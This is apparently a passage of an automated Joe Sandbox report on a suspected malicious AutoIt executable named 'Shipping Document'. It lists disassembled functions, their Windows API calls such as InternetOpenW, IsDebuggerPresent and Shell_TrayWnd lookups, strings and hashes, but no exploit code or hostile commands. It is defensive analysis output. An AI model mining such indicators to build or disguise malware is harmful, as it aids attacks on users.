                              • Opcode Fuzzy Hash: e05a7fe7108e9851aa2e841d106ab3edd28a72b60f7b845282191de9bfcc83d6
                              • Instruction Fuzzy Hash: 5D2117B261020AAFDB14DFA8C985AEA7BF8FB09314F014669F995D2240E635E8619B50
                              APIs
                              • GetWindowTextLengthW.USER32(00000000), ref: 01046C11
                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01046C20
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: LengthMessageSendTextWindow
                              • String ID: edit
                              • API String ID: 2978978980-2167791130
                              • Opcode ID: fc617fbdb6b6c751f55a2feb22eb991981f2bd43ac36ea686e893baf3777efec
                              • Instruction ID: e0a02b5ff545e2fb2656b44e720a71f9bfb13baca6e2c7e1bd9703f22558e89e
                              • Opcode Fuzzy Hash: fc617fbdb6b6c751f55a2feb22eb991981f2bd43ac36ea686e893baf3777efec
                              • Instruction Fuzzy Hash: 3611BFB1500209ABEB515E68DC81AFB37A9EB06374F104728F9A1971D0D676DC909BA0
                              APIs
                              • _memset.LIBCMT ref: 01022F11
                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01022F30
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: InfoItemMenu_memset
                              • String ID: 0
                              • API String ID: 2223754486-4108050209
                              • Opcode ID: 9b2e9d3b1e80b5523b9d801414427bca43b900a18f8f1e0f8f7ac8d323bdeac0
                              • Instruction ID: c73b9e136482d78a8793880d156fd39b2536241fe88e021cda674c27f450a745
                              • Opcode Fuzzy Hash: 9b2e9d3b1e80b5523b9d801414427bca43b900a18f8f1e0f8f7ac8d323bdeac0
                              • Instruction Fuzzy Hash: 6811E671905134ABEBA0EADCDC44FAE7BE9EB01310F0500F1EAC4A72A0DBB1A904C795
                              APIs
                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 01032520
                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01032549
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Internet$OpenOption
                              • String ID: <local>
                              • API String ID: 942729171-4266983199
                              • Opcode ID: 87f39f98dbdeddc2433ce7b592e8e8726fefc1f030d9dcf7d4c0a7b1f9163ae6
                              • Instruction ID: 9b7fce2afd564ce8ef6d162985f964ebeb40074fbef4e9251a980877d5146c99
                              • Opcode Fuzzy Hash: 87f39f98dbdeddc2433ce7b592e8e8726fefc1f030d9dcf7d4c0a7b1f9163ae6
                              • Instruction Fuzzy Hash: 481106B0500225BADB259F558C99FBBFFACFF46651F00816AF58686081D7706650C7F0
                              APIs
                                • Part of subcall function 0103830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,010380C8,?,00000000,?,?), ref: 01038322
                              • inet_addr.WSOCK32(00000000), ref: 010380CB
                              • htons.WSOCK32(00000000), ref: 01038108
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ByteCharMultiWidehtonsinet_addr
                              • String ID: 255.255.255.255
                              • API String ID: 2496851823-2422070025
                              • Opcode ID: 756a16bcb0deabc14e59fcd5982cf6aa872f61e112707971983acd219734cc87
                              • Instruction ID: c6fd15d08da3e4c2a67fdb8eb97b024148909a6e19c3368fcb3a6d08dd868949
                              • Opcode Fuzzy Hash: 756a16bcb0deabc14e59fcd5982cf6aa872f61e112707971983acd219734cc87
                              • Instruction Fuzzy Hash: F811E574600206ABDB20DF68CC86FEEB368FF44310F10C69BFA5197281DA76A810C755
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7
                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01019355
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              • Opcode ID: 4e776baad4f721ca18f0f2d9acaa162e771763abf8c9dc39524851c6baeb449c
                              • Instruction ID: c8a3d157c7781cac4ceac45fb7016b5dc8c734b73def42c0d13cf97f343eaef6
                              • Opcode Fuzzy Hash: 4e776baad4f721ca18f0f2d9acaa162e771763abf8c9dc39524851c6baeb449c
                              • Instruction Fuzzy Hash: 8301F171A01216ABCB04FBA5CCA2DFE77A9BF06760B00065DF9B2572C5DF396908D750
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7
                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0101924D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              • Opcode ID: b067752d1eca55d93c7eeee031149ec13ce34b8f6f89b1214d7d4825e1962ccc
                              • Instruction ID: a2b44ff2af167cad63b3ef36c4ee732737c27836937290ad13c94ee0c9eeb758
                              • Opcode Fuzzy Hash: b067752d1eca55d93c7eeee031149ec13ce34b8f6f89b1214d7d4825e1962ccc
                              • Instruction Fuzzy Hash: FD014271E4120A6BCB04FBA0CEA2EFE77AC9F05740F10015DB98267281EE1D6F0C96B1
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7
                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 010192D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              • Opcode ID: 65f47d9d3c2d450b090c858b36acd19da6464f869e1023cd898d354c6fc97200
                              • Instruction ID: 509372767e9a1d7ca992a9fc30ca0313f45ac33d086158b6dcf30736106392a8
                              • Opcode Fuzzy Hash: 65f47d9d3c2d450b090c858b36acd19da6464f869e1023cd898d354c6fc97200
                              • Instruction Fuzzy Hash: F0012671E4120A6BCB00FAA5CE92EFE77AC9F10750F14015DB98263285DA2D5F0C96B1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClassName_wcscmp
                              • String ID: #32770
                              • API String ID: 2292705959-463685578
                              • Opcode ID: fb14bacbf205e0a03e08bb012dd4fc811093037cad311212581d17d8e8627115
                              • Instruction ID: 07644d08d8fd743db838f3bc4844b9361f2b9f0c1f8c90819145ddcc01c676eb
                              • Opcode Fuzzy Hash: fb14bacbf205e0a03e08bb012dd4fc811093037cad311212581d17d8e8627115
                              • Instruction Fuzzy Hash: 4CE02B72A0423957D32095999C49B97F7ACEB41721F00005AF950D3040D565950587E0
                              APIs
                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 010181CA
                                • Part of subcall function 00FE3598: _doexit.LIBCMT ref: 00FE35A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Message_doexit
                              • String ID: AutoIt$Error allocating memory.
                              • API String ID: 1993061046-4017498283
                              • Opcode ID: e985bc8593c82ce0cd0781f9826a0929c75092d1331bead0eaec2aedf6585bc7
                              • Instruction ID: e0f2163a70135eb313dc36180f37ea71db9fa40599a673360a65bf46723f50b6
                              • Opcode Fuzzy Hash: e985bc8593c82ce0cd0781f9826a0929c75092d1331bead0eaec2aedf6585bc7
                              • Instruction Fuzzy Hash: 64D05B323C535932D26432BA6D0BFC67D884B05B55F04441ABB48995D38EEA558152DD
                              APIs
                                • Part of subcall function 00FFB564: _memset.LIBCMT ref: 00FFB571
                                • Part of subcall function 00FE0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FFB540,?,?,?,00FC100A), ref: 00FE0B89
                              • IsDebuggerPresent.KERNEL32(?,?,?,00FC100A), ref: 00FFB544
                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FC100A), ref: 00FFB553
                              Strings
                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FFB54E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                              • API String ID: 3158253471-631824599
                              • Opcode ID: 29048dfa1d57ced926229ff448fe3d3fb708e6ec01d70d2451d3755d1d371841
                              • Instruction ID: 40664510df01fee249e211ab69aa17f3e328725f7333b51b427221ac02521f66
                              • Opcode Fuzzy Hash: 29048dfa1d57ced926229ff448fe3d3fb708e6ec01d70d2451d3755d1d371841
                              • Instruction Fuzzy Hash: 4CE06DB46007158BD330DF29DA047527BE4AF00758F08892DE5C6C6255DBBDD444DB61
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01045BF5
                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01045C08
                                • Part of subcall function 010254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0102555E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: dbb2f83a5bf12dcf1b8bc18204d28a6505cc8dfe6c07242f7a031db678b537e5
                              • Instruction ID: 9aa54ff305ee12a4fc1501182b7dc3894b5676d13adabe0d4eed12fab843cb4c
                              • Opcode Fuzzy Hash: dbb2f83a5bf12dcf1b8bc18204d28a6505cc8dfe6c07242f7a031db678b537e5
                              • Instruction Fuzzy Hash: BCD0A975388312B7E334AA30AC4BFD76A10AB00B40F000828B385AA0C0C8E86800C344